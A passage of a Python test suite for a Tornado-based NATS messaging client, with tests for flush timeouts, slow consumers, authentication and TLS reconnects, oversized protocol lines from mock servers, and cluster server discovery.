def parse(self, data=''):
yield tornado.gen.sleep(2.0)
yield self.nc._process_pong()
nc = Client()
nc._ps = Parser(nc, self)
yield nc.connect(io_loop=self.io_loop)
with self.assertRaises(tornado.gen.TimeoutError):
yield nc.flush(timeout=1)
self.assertEqual(0, len(nc._pongs))
@tornado.testing.gen_test(timeout=15)
def test_flush_timeout_lost_message(self):
class Parser():
def __init__(self, nc):
self.nc = nc
self.drop_messages = False
@tornado.gen.coroutine
def parse(self, data=''):
if not self.drop_messages:
yield self.nc._process_pong()
nc = Client()
nc._ps = Parser(nc)
yield nc.connect(loop=self.io_loop)
nc._ps.drop_messages = True
with self.assertRaises(tornado.gen.TimeoutError):
yield nc.flush(timeout=1)
self.assertEqual(0, len(nc._pongs))
self.assertEqual(0, nc._pings_outstanding)
self.assertEqual(0, nc._pongs_received)
# Successful flush must clear timed out pong and the new one.
nc._ps.drop_messages = False
try:
yield nc.flush(timeout=1)
finally:
self.assertEqual(0, len(nc._pongs))
self.assertEqual(0, nc._pings_outstanding)
self.assertEqual(1, nc._pongs_received)
@tornado.testing.gen_test
def test_timed_request_timeout(self):
class Parser():
def __init__(self, nc, t):
self.nc = nc
self.t = t
def parse(self, data=''):
self.nc._process_pong()
nc = Client()
nc._ps = Parser(nc, self)
yield nc.connect(io_loop=self.io_loop)
with self.assertRaises(tornado.gen.TimeoutError):
yield nc.timed_request("hello", "world", timeout=0.5)
@tornado.testing.gen_test
def test_process_message_subscription_not_present(self):
nc = Client()
yield nc._process_msg(387, 'some-subject', 'some-reply', [0, 1, 2])
@tornado.testing.gen_test
def test_subscribe_async_process_messages_concurrently(self):
nc = Client()
yield nc.connect(io_loop=self.io_loop)
@tornado.gen.coroutine
def sub_foo_handler(msg):
msgs = sub_foo_handler.msgs
msgs.append(msg)
# Should not block other subscriptions processing
# the messages in parallel...
yield tornado.gen.sleep(1)
sub_foo_handler.msgs = []
yield nc.subscribe("foo", cb=sub_foo_handler)
@tornado.gen.coroutine
def sub_bar_handler(msg):
nc = sub_bar_handler.nc
msgs = sub_bar_handler.msgs
msgs.append(msg)
yield nc.publish(msg.reply, "OK!")
sub_bar_handler.nc = nc
sub_bar_handler.msgs = []
yield nc.subscribe("bar", cb=sub_bar_handler)
@tornado.gen.coroutine
def sub_quux_handler(msg):
msgs = sub_quux_handler.msgs
msgs.append(msg)
sub_quux_handler.msgs = []
yield nc.subscribe("quux", cb=sub_quux_handler)
yield nc.publish("foo", "hello")
for i in range(0, 10):
yield nc.publish("quux", "test-{}".format(i))
response = yield nc.request("bar", b'help')
self.assertEqual(response.data, 'OK!')
yield tornado.gen.sleep(0.2)
self.assertEqual(len(sub_foo_handler.msgs), 1)
self.assertEqual(len(sub_bar_handler.msgs), 1)
self.assertEqual(len(sub_quux_handler.msgs), 10)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_slow_consumer_pending_msgs_limit(self):
nc = Client()
def error_cb(err):
error_cb.errors.append(err)
error_cb.errors = []
yield nc.connect(io_loop=self.io_loop, error_cb=error_cb)
@tornado.gen.coroutine
def sub_hello_handler(msg):
msgs = sub_hello_handler.msgs
msgs.append(msg)
if len(msgs) == 5:
yield tornado.gen.sleep(0.5)
sub_hello_handler.msgs = []
yield nc.subscribe("hello", cb=sub_hello_handler, pending_msgs_limit=5)
for i in range(0, 20):
yield nc.publish("hello", "test-{}".format(i))
yield nc.flush(1)
# Wait a bit for subscriber to recover
yield tornado.gen.sleep(0.5)
for i in range(0, 3):
yield nc.publish("hello", "ok-{}".format(i))
yield nc.flush(1)
# Wait a bit to receive the final messages
yield tornado.gen.sleep(0.5)
# There would be a few async slow consumer errors
errors = error_cb.errors
self.assertTrue(len(errors) > 0)
self.assertTrue(type(errors[0]) is ErrSlowConsumer)
# We should have received some messages and dropped others,
# but definitely got the last 3 messages after recovering
# from the slow consumer error.
msgs = sub_hello_handler.msgs
self.assertEqual(len(msgs), 13)
msgs = sub_hello_handler.msgs[-3:]
for i in range(0, 3):
self.assertEqual("ok-{}".format(i), msgs[i].data)
yield nc.close()
@tornado.testing.gen_test
def test_subscribe_slow_consumer_pending_bytes_limit(self):
nc = Client()
def error_cb(err):
error_cb.errors.append(err)
error_cb.errors = []
yield nc.connect(io_loop=self.io_loop, error_cb=error_cb)
@tornado.gen.coroutine
def sub_hello_handler(msg):
msgs = sub_hello_handler.msgs
msgs.append(msg)
sub_hello_handler.data += msg.data
if len(sub_hello_handler.data) == 10:
yield tornado.gen.sleep(0.5)
sub_hello_handler.msgs = []
sub_hello_handler.data = ''
yield nc.subscribe(
"hello", cb=sub_hello_handler, pending_bytes_limit=10)
for i in range(0, 20):
yield nc.publish("hello", "A")
yield nc.flush(1)
# Wait a bit for subscriber to recover
yield tornado.gen.sleep(1)
for i in range(0, 3):
yield nc.publish("hello", "B")
yield nc.flush(1)
# Wait a bit to receive the final messages
yield tornado.gen.sleep(1)
# There would be a few async slow consumer errors
errors = error_cb.errors
self.assertTrue(len(errors) > 0)
self.assertTrue(type(errors[0]) is ErrSlowConsumer)
# We should have received some messages and dropped others,
# but definitely got the last 3 messages after recovering
# from the slow consumer error.
msgs = sub_hello_handler.msgs
self.assertTrue(len(msgs) > 10 and len(msgs) != 23)
msgs = sub_hello_handler.msgs[-3:]
for i in range(0, 3):
self.assertEqual("B", msgs[i].data)
yield nc.close()
@tornado.testing.gen_test
def test_close_stops_subscriptions_loops(self):
nc = Client()
def error_cb(err):
error_cb.errors.append(err)
error_cb.errors = []
yield nc.connect(io_loop=self.io_loop, error_cb=error_cb)
@tornado.gen.coroutine
def sub_hello_handler(msg):
msgs = sub_hello_handler.msgs
msgs.append(msg)
sub_hello_handler.msgs = []
yield nc.subscribe("hello.foo.bar", cb=sub_hello_handler)
yield nc.subscribe("hello.*.*", cb=sub_hello_handler)
yield nc.subscribe("hello.>", cb=sub_hello_handler)
yield nc.subscribe(">", cb=sub_hello_handler)
for i in range(0, 10):
yield nc.publish("hello.foo.bar", "test-{}".format(i))
yield nc.flush(1)
msgs = sub_hello_handler.msgs
self.assertEqual(len(msgs), 40)
self.assertEqual(len(nc._subs), 4)
subs = []
for _, sub in nc._subs.items():
subs.append(sub)
self.assertEqual(sub.closed, False)
yield nc.close()
# Close should have removed all subscriptions
self.assertEqual(len(nc._subs), 0)
# Let background message processors stop
yield tornado.gen.sleep(0)
self.assertEqual(len(self.io_loop._callbacks), 0)
for sub in subs:
self.assertEqual(sub.closed, True)
@tornado.testing.gen_test(timeout=10)
def test_subscribe_no_echo(self):
nc = NATS()
msgs = []
nc2 = NATS()
msgs2 = []
@tornado.gen.coroutine
def subscription_handler(msg):
msgs.append(msg)
@tornado.gen.coroutine
def subscription_handler2(msg):
msgs2.append(msg)
yield nc.connect(loop=self.io_loop, no_echo=True)
sid = yield nc.subscribe("foo", cb=subscription_handler)
yield nc.flush()
yield nc2.connect(loop=self.io_loop, no_echo=False)
sid2 = yield nc2.subscribe("foo", cb=subscription_handler2)
yield nc2.flush()
payload = b'hello world'
for i in range(0, 10):
yield nc.publish("foo", payload)
yield nc.flush()
# Wait a bit for message to be received.
yield tornado.gen.sleep(0.5)
self.assertEqual(0, len(msgs))
self.assertEqual(10, len(msgs2))
self.assertEqual(0, nc._subs[sid].received)
self.assertEqual(10, nc2._subs[sid].received)
yield nc.close()
yield nc2.close()
self.assertEqual(0, nc.stats['in_msgs'])
self.assertEqual(0, nc.stats['in_bytes'])
self.assertEqual(10, nc.stats['out_msgs'])
self.assertEqual(110, nc.stats['out_bytes'])
self.assertEqual(10, nc2.stats['in_msgs'])
self.assertEqual(110, nc2.stats['in_bytes'])
self.assertEqual(0, nc2.stats['out_msgs'])
self.assertEqual(0, nc2.stats['out_bytes'])
class ClientAuthTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
self.threads = []
self.server_pool = []
server1 = Gnatsd(port=4223, user="foo", password="bar", http_port=8223)
server2 = Gnatsd(port=4224, user="hoge", password="fuga", http_port=8224)
self.server_pool.append(server1)
self.server_pool.append(server2)
for gnatsd in self.server_pool:
t = threading.Thread(target=gnatsd.start)
self.threads.append(t)
t.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response1 = http.fetch('http://127.0.0.1:8223/varz')
response2 = http.fetch('http://127.0.0.1:8224/varz')
if response1.code == 200 and response2.code == 200:
break
continue
except:
time.sleep(0.1)
continue
super(ClientAuthTest, self).setUp()
def tearDown(self):
super(ClientAuthTest, self).tearDown()
for gnatsd in self.server_pool:
gnatsd.finish()
for t in self.threads:
t.join()
@tornado.testing.gen_test(timeout=10)
def test_auth_connect(self):
class SampleClient():
def __init__(self):
self.nc = Client()
self.errors = []
self.disconnected_future = tornado.concurrent.Future()
self.reconnected_future = tornado.concurrent.Future()
self.closed_future = tornado.concurrent.Future()
@tornado.gen.coroutine
def foo(self, msg):
yield self.nc.publish(msg.reply, "OK:{}:{}".format(msg.subject, msg.data))
@tornado.gen.coroutine
def bar(self, msg):
yield self.nc.publish(msg.reply, "OK:{}:{}".format(msg.subject, msg.data))
@tornado.gen.coroutine
def quux(self, msg):
yield self.nc.publish(msg.reply, "OK:{}:{}".format(msg.subject, msg.data))
def error_cb(self, err):
self.errors.append(err)
def disconnected_cb(self):
if not self.disconnected_future.done():
self.disconnected_future.set_result(True)
def reconnected_cb(self):
if not self.reconnected_future.done():
self.reconnected_future.set_result(True)
def closed_cb(self):
if not self.closed_future.done():
self.closed_future.set_result(True)
c = SampleClient()
options = {
"dont_randomize": True,
"servers": [
"nats://foo:[email protected]:4223",
"nats://hoge:[email protected]:4224"
],
"loop": self.io_loop,
"error_cb": c.error_cb,
"reconnected_cb": c.reconnected_cb,
"closed_cb": c.closed_cb,
"disconnected_cb": c.disconnected_cb,
"reconnect_time_wait": 0.1,
"max_reconnect_attempts": 3,
}
yield c.nc.connect(**options)
self.assertEqual(True, c.nc._server_info["auth_required"])
sid_1 = yield c.nc.subscribe("foo", "", c.foo)
sid_2 = yield c.nc.subscribe("bar", "", c.bar)
sid_3 = yield c.nc.subscribe("quux", "", c.quux)
self.assertEqual(sid_1, 1)
self.assertEqual(sid_2, 2)
self.assertEqual(sid_3, 3)
yield c.nc.flush()
msg = yield c.nc.request("foo", b"hello")
self.assertEqual(msg.data, "OK:foo:hello")
msg = yield c.nc.request("bar", b"hello")
self.assertEqual(msg.data, "OK:bar:hello")
msg = yield c.nc.request("quux", b"hello")
self.assertEqual(msg.data, "OK:quux:hello")
# Trigger reconnect
a = c.nc._current_server
orig_gnatsd = self.server_pool.pop(0)
orig_gnatsd.finish()
yield tornado.gen.sleep(1)
# Use future for when disconnect/reconnect events to happen.
try:
yield tornado.gen.with_timeout(timedelta(seconds=2), c.disconnected_future)
yield tornado.gen.with_timeout(timedelta(seconds=2), c.reconnected_future)
finally:
b = c.nc._current_server
self.assertNotEqual(a.uri, b.uri)
# Should still be able to request/response after reconnect.
response = yield c.nc.request("foo", b"world")
self.assertEqual(response.data, "OK:foo:world")
response = yield c.nc.request("bar", b"world")
self.assertEqual(response.data, "OK:bar:world")
response = yield c.nc.request("quux", b"world")
self.assertEqual(response.data, "OK:quux:world")
self.assertTrue(c.nc.is_connected)
self.assertFalse(c.nc.is_reconnecting)
self.assertFalse(c.nc.is_closed)
# Start original server with different auth and should eventually closed connection.
conf = """
port = 4223
http = 8223
authorization {
user = hoge
pass = fuga
}
"""
with Gnatsd(port=4223, http_port=8223, conf=conf) as gnatsd:
# Reset futures before closing.
c.disconnected_future = tornado.concurrent.Future()
other_gnatsd = self.server_pool.pop(0)
other_gnatsd.finish()
# Reconnect once again
yield tornado.gen.with_timeout(timedelta(seconds=2), c.disconnected_future)
yield tornado.gen.with_timeout(timedelta(seconds=2), c.closed_future)
# There will be a mix of Authorization errors and StreamClosedError errors.
self.assertTrue(c.errors > 1)
@tornado.testing.gen_test(timeout=10)
def test_auth_connect_fails(self):
class Component:
def __init__(self, nc):
self.nc = nc
self.errors = []
self.disconnected_cb_called = tornado.concurrent.Future()
self.closed_cb_called = tornado.concurrent.Future()
self.reconnected_cb_called = False
self.log = Log()
def error_cb(self, err):
self.errors.append(err)
def disconnected_cb(self):
if not self.disconnected_cb_called.done():
self.disconnected_cb_called.set_result(True)
def close_cb(self):
if not self.closed_cb_called.done():
self.closed_cb_called.set_result(True)
def reconnected_cb(self):
self.reconnected_cb_called = True
nc = Client()
c = Component(nc)
conf = """
port = 4228
http = 8448
authorization {
user = foo
pass = bar
}
"""
with Gnatsd(port=4228, http_port=8448, conf=conf) as gnatsd:
yield c.nc.connect(
loop=self.io_loop,
dont_randomize=True,
servers=[
"nats://foo:[email protected]:4228",
"nats://foo2:[email protected]:4224"
],
closed_cb=c.close_cb,
error_cb=c.error_cb,
disconnected_cb=c.disconnected_cb,
reconnected_cb=c.reconnected_cb,
max_reconnect_attempts=2,
reconnect_time_wait=0.1,
)
self.assertEqual(True, c.nc.is_connected)
self.assertEqual(True, nc._server_info["auth_required"])
# Confirm that messages went through
yield c.nc.subscribe("foo", "", c.log.persist)
yield c.nc.flush()
yield c.nc.publish("foo", "bar")
yield c.nc.flush()
yield tornado.gen.sleep(0.5)
# Shutdown first server, triggering reconnect...
gnatsd.finish()
# Wait for reconnect logic kick in and then fail due to authorization error.
yield tornado.gen.with_timeout(
timedelta(seconds=1), c.disconnected_cb_called)
yield tornado.gen.with_timeout(
timedelta(seconds=1), c.closed_cb_called)
errors_at_close = len(c.errors)
for i in range(0, 20):
yield tornado.gen.sleep(0.1)
errors_after_close = len(c.errors)
self.assertEqual(errors_at_close, errors_after_close)
self.assertEqual(1, len(c.log.records["foo"]))
@tornado.testing.gen_test(timeout=10)
def test_connect_with_auth_token_option(self):
nc = NATS()
conf = """
port = 4227
http = 8227
authorization {
token = token
}
"""
with Gnatsd(port=4227, http_port=8227, conf=conf) as gnatsd:
yield nc.connect("nats://127.0.0.1:4227",
token='token',
loop=self.io_loop,
)
self.assertIn('auth_required', nc._server_info)
self.assertTrue(nc.is_connected)
received = tornado.concurrent.Future()
@tornado.gen.coroutine
def handler(msg):
received.set_result(msg)
yield nc.subscribe("foo", cb=handler)
yield nc.flush()
yield nc.publish("foo", b'bar')
yield tornado.gen.with_timeout(
timedelta(seconds=1), received)
yield nc.close()
self.assertTrue(nc.is_closed)
self.assertFalse(nc.is_connected)
@tornado.testing.gen_test(timeout=10)
def test_close_connection(self):
nc = Client()
options = {
"dont_randomize":
True,
"servers": [
"nats://foo:[email protected]:4223",
"nats://hoge:[email protected]:4224"
],
"io_loop":
self.io_loop
}
yield nc.connect(**options)
self.assertEqual(True, nc._server_info["auth_required"])
log = Log()
sid_1 = yield nc.subscribe("foo", "", log.persist)
self.assertEqual(sid_1, 1)
sid_2 = yield nc.subscribe("bar", "", log.persist)
self.assertEqual(sid_2, 2)
sid_3 = yield nc.subscribe("quux", "", log.persist)
self.assertEqual(sid_3, 3)
yield nc.publish("foo", "hello")
yield tornado.gen.sleep(1.0)
# Done
yield nc.close()
orig_gnatsd = self.server_pool.pop(0)
orig_gnatsd.finish()
try:
a = nc._current_server
# Wait and assert that we don't reconnect.
yield tornado.gen.sleep(3)
finally:
b = nc._current_server
self.assertEqual(a.uri, b.uri)
self.assertFalse(nc.is_connected)
self.assertFalse(nc.is_reconnecting)
self.assertTrue(nc.is_closed)
with (self.assertRaises(ErrConnectionClosed)):
yield nc.publish("hello", "world")
with (self.assertRaises(ErrConnectionClosed)):
yield nc.flush()
with (self.assertRaises(ErrConnectionClosed)):
yield nc.subscribe("hello", "worker")
with (self.assertRaises(ErrConnectionClosed)):
yield nc.publish_request("hello", "inbox", "world")
with (self.assertRaises(ErrConnectionClosed)):
yield nc.request("hello", "world")
with (self.assertRaises(ErrConnectionClosed)):
yield nc.timed_request("hello", "world")
class ClientTLSTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
self.threads = []
self.server_pool = []
conf = """
# Simple TLS config file
port: 4444
net: 127.0.0.1
http_port: 8222
tls {
cert_file: './tests/configs/certs/server-cert.pem'
key_file: './tests/configs/certs/server-key.pem'
ca_file: './tests/configs/certs/ca.pem'
timeout: 10
}
"""
config_file = tempfile.NamedTemporaryFile(mode='w', delete=True)
config_file.write(conf)
config_file.flush()
server = Gnatsd(port=4444, http_port=8222, config_file=config_file)
self.server_pool.append(server)
server = Gnatsd(port=4445, http_port=8223, config_file=config_file)
self.server_pool.append(server)
for gnatsd in self.server_pool:
t = threading.Thread(target=gnatsd.start)
self.threads.append(t)
t.start()
http = tornado.httpclient.HTTPClient()
while True:
try:
response = http.fetch(
'http://127.0.0.1:%d/varz' % gnatsd.http_port)
if response.code == 200:
break
continue
except:
time.sleep(0.1)
continue
super(ClientTLSTest, self).setUp()
def tearDown(self):
for gnatsd in self.server_pool:
gnatsd.finish()
for t in self.threads:
t.join()
super(ClientTLSTest, self).tearDown()
@tornado.testing.gen_test(timeout=10)
def test_tls_connection(self):
class Component:
def __init__(self, nc):
self.nc = nc
self.error = None
self.error_cb_called = False
self.close_cb_called = False
self.disconnected_cb_called = False
self.reconnected_cb_called = False
self.msgs = []
@tornado.gen.coroutine
def subscription_handler(self, msg):
yield self.nc.publish(msg.reply, 'hi')
def error_cb(self, err):
self.error = err
self.error_cb_called = True
def close_cb(self):
self.close_cb_called = True
def disconnected_cb(self):
self.disconnected_cb_called = True
def reconnected_cb(self):
self.reconnected_cb_called = True
nc = Client()
c = Component(nc)
options = {
"servers": ["nats://127.0.0.1:4444"],
"io_loop": self.io_loop,
"close_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb
}
yield c.nc.connect(**options)
yield c.nc.subscribe("hello", cb=c.subscription_handler)
yield c.nc.flush()
for i in range(0, 10):
msg = yield c.nc.timed_request("hello", b'world')
c.msgs.append(msg)
self.assertEqual(len(c.msgs), 10)
self.assertFalse(c.disconnected_cb_called)
self.assertFalse(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertFalse(c.reconnected_cb_called)
# Should be able to close normally
yield c.nc.close()
self.assertTrue(c.disconnected_cb_called)
self.assertTrue(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertFalse(c.reconnected_cb_called)
@tornado.testing.gen_test(timeout=15)
def test_tls_reconnection(self):
class Component:
def __init__(self, nc):
self.nc = nc
self.error = None
self.error_cb_called = False
self.close_cb_called = False
self.disconnected_cb_called = False
self.reconnected_cb_called = False
self.msgs = []
self.reconnected_future = tornado.concurrent.Future()
self.disconnected_future = tornado.concurrent.Future()
@tornado.gen.coroutine
def subscription_handler(self, msg):
yield self.nc.publish(msg.reply, 'hi')
def error_cb(self, err):
self.error = err
self.error_cb_called = True
def close_cb(self):
self.close_cb_called = True
def disconnected_cb(self):
self.disconnected_cb_called = True
if not self.disconnected_future.done():
self.disconnected_future.set_result(True)
def reconnected_cb(self):
self.reconnected_cb_called = True
if not self.reconnected_future.done():
self.reconnected_future.set_result(True)
nc = Client()
c = Component(nc)
options = {
"dont_randomize": True,
"servers": [
"nats://127.0.0.1:4444",
"nats://127.0.0.1:4445",
],
"loop": self.io_loop,
"closed_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb,
"reconnect_time_wait": 0.1,
"max_reconnect_attempts": 5
}
yield c.nc.connect(**options)
yield c.nc.subscribe("hello", cb=c.subscription_handler)
yield c.nc.flush()
for i in range(0, 5):
msg = yield c.nc.request("hello", b'world')
c.msgs.append(msg)
self.assertEqual(5, len(c.msgs))
# Trigger disconnect...
orig_gnatsd = self.server_pool.pop(0)
orig_gnatsd.finish()
try:
a = nc._current_server
# Wait for reconnect logic kick in...
yield tornado.gen.with_timeout(
timedelta(seconds=5), c.disconnected_future)
yield tornado.gen.with_timeout(
timedelta(seconds=5), c.reconnected_future)
finally:
b = nc._current_server
self.assertNotEqual(a.uri, b.uri)
self.assertTrue(c.disconnected_cb_called)
self.assertFalse(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertTrue(c.reconnected_cb_called)
for i in range(0, 5):
msg = yield c.nc.request("hello", b'world')
c.msgs.append(msg)
self.assertEqual(len(c.msgs), 10)
# Should be able to close normally
yield c.nc.close()
self.assertTrue(c.disconnected_cb_called)
self.assertTrue(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertTrue(c.reconnected_cb_called)
class ClientTLSCertsTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
super(ClientTLSCertsTest, self).setUp()
class Component:
def __init__(self, nc):
self.nc = nc
self.error = None
self.error_cb_called = False
self.close_cb_called = False
self.disconnected_cb_called = False
self.reconnected_cb_called = False
self.msgs = []
@tornado.gen.coroutine
def subscription_handler(self, msg):
yield self.nc.publish(msg.reply, 'hi')
def error_cb(self, err):
self.error = err
self.error_cb_called = True
def close_cb(self):
self.close_cb_called = True
def disconnected_cb(self):
self.disconnected_cb_called = True
def reconnected_cb(self):
self.reconnected_cb_called = True
@tornado.testing.gen_test(timeout=10)
def test_tls_verify(self):
nc = Client()
c = self.Component(nc)
options = {
"servers": ["nats://127.0.0.1:4446"],
"allow_reconnect": False,
"io_loop": self.io_loop,
"close_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb,
"tls": {
"cert_reqs": ssl.CERT_REQUIRED,
"ca_certs": "./tests/configs/certs/ca.pem",
"keyfile": "./tests/configs/certs/client-key.pem",
"certfile": "./tests/configs/certs/client-cert.pem"
}
}
conf = """
port: 4446
net: 127.0.0.1
http_port: 8446
tls {
cert_file: './tests/configs/certs/server-cert.pem'
key_file: './tests/configs/certs/server-key.pem'
ca_file: './tests/configs/certs/ca.pem'
timeout: 10
verify: true
}
"""
with Gnatsd(port=4446, http_port=8446, conf=conf) as gnatsd:
yield c.nc.connect(**options)
yield c.nc.subscribe("hello", cb=c.subscription_handler)
yield c.nc.flush()
for i in range(0, 10):
msg = yield c.nc.timed_request("hello", b'world')
c.msgs.append(msg)
self.assertEqual(len(c.msgs), 10)
self.assertFalse(c.disconnected_cb_called)
self.assertFalse(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertFalse(c.reconnected_cb_called)
# Should be able to close normally
yield c.nc.close()
self.assertTrue(c.disconnected_cb_called)
self.assertTrue(c.close_cb_called)
self.assertFalse(c.error_cb_called)
self.assertFalse(c.reconnected_cb_called)
@tornado.testing.gen_test(timeout=10)
def test_tls_verify_short_timeout_no_servers_available(self):
nc = Client()
c = self.Component(nc)
options = {
"servers": ["nats://127.0.0.1:4446"],
"allow_reconnect": False,
"io_loop": self.io_loop,
"close_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb,
"tls": {
"cert_reqs": ssl.CERT_REQUIRED,
"ca_certs": "./tests/configs/certs/ca.pem",
"keyfile": "./tests/configs/certs/client-key.pem",
"certfile": "./tests/configs/certs/client-cert.pem"
}
}
conf = """
# port: 4446
port: 4446
net: 127.0.0.1
http_port: 8446
tls {
cert_file: './tests/configs/certs/server-cert.pem'
key_file: './tests/configs/certs/server-key.pem'
ca_file: './tests/configs/certs/ca.pem'
timeout: 0.0001
verify: true
}
"""
with Gnatsd(port=4446, http_port=8446, conf=conf) as gnatsd:
with self.assertRaises(ErrNoServers):
yield c.nc.connect(**options)
@tornado.testing.gen_test(timeout=10)
def test_tls_verify_fails(self):
nc = Client()
c = self.Component(nc)
port = 4447
http_port = 8447
options = {
"servers": ["nats://127.0.0.1:%d" % port],
"max_reconnect_attempts": 5,
"io_loop": self.io_loop,
"close_cb": c.close_cb,
"error_cb": c.error_cb,
"disconnected_cb": c.disconnected_cb,
"reconnected_cb": c.reconnected_cb,
"reconnect_time_wait": 0.1,
"tls": {
"cert_reqs": ssl.CERT_REQUIRED,
# "ca_certs": "./tests/configs/certs/ca.pem",
"keyfile": "./tests/configs/certs/client-key.pem",
"certfile": "./tests/configs/certs/client-cert.pem"
}
}
conf = """
port: %d
net: 127.0.0.1
http_port: %d
tls {
cert_file: './tests/configs/certs/server-cert.pem'
key_file: './tests/configs/certs/server-key.pem'
ca_file: './tests/configs/certs/ca.pem'
timeout: 10
verify: true
}
""" % (port, http_port)
with Gnatsd(port=port, http_port=http_port, conf=conf) as gnatsd:
with self.assertRaises(NatsError):
yield c.nc.connect(**options)
class ShortControlLineNATSServer(tornado.tcpserver.TCPServer):
@tornado.gen.coroutine
def handle_stream(self, stream, address):
while True:
try:
info_line = """INFO {"max_payload": 1048576, "tls_required": false, "server_id":"zrPhBhrjbbUdp2vndDIvE7"}\r\n"""
yield stream.write(info_line)
# Client will be awaiting for a pong next before reaching connected state.
yield stream.write("""PONG\r\n""")
yield tornado.gen.sleep(1)
except tornado.iostream.StreamClosedError:
break
class LargeControlLineNATSServer(tornado.tcpserver.TCPServer):
@tornado.gen.coroutine
def handle_stream(self, stream, address):
while True:
try:
line = """INFO {"max_payload": 1048576, "tls_required": false, "server_id":"%s"}\r\n"""
info_line = line % ("a" * 2048)
yield stream.write(info_line)
# Client will be awaiting for a pong next before reaching connected state.
yield stream.write("""PONG\r\n""")
yield tornado.gen.sleep(1)
except tornado.iostream.StreamClosedError:
break
class ClientConnectTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
super(ClientConnectTest, self).setUp()
def tearDown(self):
super(ClientConnectTest, self).tearDown()
@tornado.testing.gen_test(timeout=5)
def test_connect_info_large_protocol_line(self):
# Start mock TCP Server
server = LargeControlLineNATSServer()
server.listen(4229)
nc = Client()
options = {
"dont_randomize": True,
"servers": ["nats://127.0.0.1:4229"],
"io_loop": self.io_loop,
"verbose": False
}
yield nc.connect(**options)
self.assertTrue(nc.is_connected)
@tornado.testing.gen_test(timeout=5)
def test_connect_info_large_protocol_line_2(self):
# Start mock TCP Server
server = ShortControlLineNATSServer()
server.listen(4229)
nc = Client()
options = {
"dont_randomize": True,
"servers": ["nats://127.0.0.1:4229"],
"io_loop": self.io_loop,
"verbose": False
}
yield nc.connect(**options)
self.assertTrue(nc.is_connected)
class ClientClusteringDiscoveryTest(tornado.testing.AsyncTestCase):
def setUp(self):
print("\n=== RUN {0}.{1}".format(self.__class__.__name__,
self._testMethodName))
super(ClientClusteringDiscoveryTest, self).setUp()
def tearDown(self):
super(ClientClusteringDiscoveryTest, self).tearDown()
@tornado.testing.gen_test(timeout=15)
def test_servers_discovery(self):
conf = """
cluster {
routes = [
nats-route://127.0.0.1:6222
]
}
"""
nc = Client()
options = {
"servers": ["nats://127.0.0.1:4222"],
"io_loop": self.io_loop,
}
with Gnatsd(port=4222, http_port=8222, cluster_port=6222, conf=conf) as nats1:
yield nc.connect(**options)
yield tornado.gen.sleep(1)
initial_uri = nc.connected_url
with Gnatsd(port=4223, http_port=8223, cluster_port=6223, conf=conf) as nats2:
yield tornado.gen.sleep(1)
srvs = {}
for item in nc._server_pool:
srvs[item.uri.port] = True
self.assertEqual(len(srvs.keys()), 2)
with Gnatsd(port=4224, http_port=8224, cluster_port=6224, conf=conf) as nats3:
yield tornado.gen.sleep(1)
for item in nc._server_pool:
srvs[item.uri.port] = True
self.assertEqual(3, len(srvs.keys()))
srvs = {}
for item in nc.discovered_servers:
srvs[item.uri.port] = True
self.assertTrue(2 <= len(srvs.keys()) <= 3)
srvs = {}
for item in nc.servers:
srvs[item.uri.port] = True
self.assertEqual(3, len(srvs.keys()))
# Terminate the first server and wait for reconnect
nats1.finish()
yield tornado.gen.sleep(1)
final_uri = nc.connected_url
self.assertNotEqual(initial_uri, final_uri)
yield nc.close()
@tornado.testing.gen_test(timeout=15)
def test_servers_discovery_no_randomize(self):
conf = """
cluster {
routes = [
nats-route://127.0.0.1:6232
]
}
"""
nc = Client()
options = {
"servers": ["nats://127.0.0.1:4232"],
"dont_randomize": True,
"loop": self.io_loop,
}
with Gnatsd(
port=4232, http_port=8232, cluster_port=6232,
conf=conf) as nats1:
yield nc.connect(**options)
yield tornado.gen.sleep(1)
with Gnatsd(
port=4233, http_port=8233, cluster_port=6233,
conf=conf) as nats2:
yield tornado.gen.sleep(1)
srvs = []
for item in nc._server_pool:
if item.uri.port not in srvs:
srvs.append(item.uri.port)
self.assertEqual(len(srvs), 2)
with Gnatsd(
port=4234, http_port=8234, cluster_port=6234,
conf=conf) as nats3:
yield tornado.gen.sleep(1)
for item in nc._server_pool:
if item.uri.port not in srvs:
srvs.append(item.uri.port)
self.assertEqual([4232, 4233, 4234], srvs)
yield nc.close()
@tornado.testing.gen_test(timeout=15)
def test_servers_discovery_auth_reconnect(self):
conf = """
cluster {
routes = [
nats-route://127.0.0.1:6222
]
}
authorization {
user = foo
pass = bar
}
"""
reconnected_future = tornado.concurrent.Future()
@tornado.gen.coroutine
def reconnected_cb():
reconnected_future.set_result(True)
nc = Client()
options = {
"servers": ["nats://127.0.0.1:4222"],
"loop": self.io_loop,
"user": "foo",
"password": "bar",
"reconnected_cb": reconnected_cb,
}
with Gnatsd(port=4222, http_port=8222, cluster_port=6222, conf=conf) as nats1:
yield nc.connect(**options)
yield tornado.gen.sleep(1)
initial_uri = nc.connected_url
with Gnatsd(port=4223, http_port=8223, cluster_port=6223, conf=conf) as nats2:
yield tornado.gen.sleep(1)
srvs = {}
for item in nc._server_pool:
srvs[item.uri.port] = True
self.assertEqual(len(srvs.keys()), 2)
with Gnatsd(port=4224, http_port=8224, cluster_port=6224, conf=conf) as nats3:
yield tornado.gen.sleep(1)
